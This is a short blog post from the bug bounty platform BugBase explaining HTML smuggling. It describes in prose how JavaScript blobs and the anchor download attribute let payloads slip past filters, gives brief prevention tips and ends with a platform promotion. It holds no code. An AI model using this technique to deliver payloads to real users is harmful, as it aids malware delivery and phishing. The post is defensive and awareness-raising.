Lethal cyber-attack everyone should know about!
Through the use of harmful payloads concealed inside of seemingly innocent HTML files, HTML smuggling allows an attacker to evade content filters and firewalls.
JavaScript blobs and the HTML5 download property coupled with the anchor tag make this possible.
What are Anchor tags and JavaScript Blobs?
One page may be linked to another resource, such as a script, another HTML page, or downloadable files, using the anchor tag <a>.
When <a> is used with the “download” attribute, it can be used to provide links to a downloadable file.
Blobs in JavaScript are objects that are a group of bytes containing data that is saved in a file. Data from blobs is kept in the user's memory. The exact places where a real file would have been utilised can also be used with this set of bytes. To put it another way, blobs can be used on the client to create objects that resemble files and can be provided to JavaScript APIs that require URLs.
For instance, a server-hosted file called "payload.exe" is downloaded into the system using the <adownload> tag. In a similar manner, the bytes of the file payload.exe can be provided as input in JS code as a JS blob, which can then be compiled and downloaded at the user end.?
Any legitimate phishing page can have HTML smuggling code included into it to improve the likelihood that the user would execute it. Advanced techniques including shortcut files, malicious PDFs, and MS Office documents with malicious macros are also possible.
Prevention -
1) Set up security software to prevent pages utilising JS or VBScript from launching a downloaded executable automatically.
2) Set javascript files to open with notepad by default and not a browser
3) Email attachments must be carefully and manually reviewed by all users.
What is BugBase?
BugBase is a curated marketplace for ethical hackers that helps businesses and startups set up bug bounty programs. It is India's first consolidated bug bounty platform, which assists organizations in staying safe by providing an all-in-one platform for continuous and comprehensive security testing.
Through BugBase registering and setting up your organisation’s bug bounty program is no less than a breeze. We also provide hackers and security professionals with the platform to directly get connected with organizations that have set up their bug bounty programs and get rewarded for the risks and vulnerabilities they find.
Thank you for being part of our BugFam! Stay up to date on our latest posts and hope you had a great week!
Join our discord community for regular updates and much more fun!!
Cheers,
BugBase Team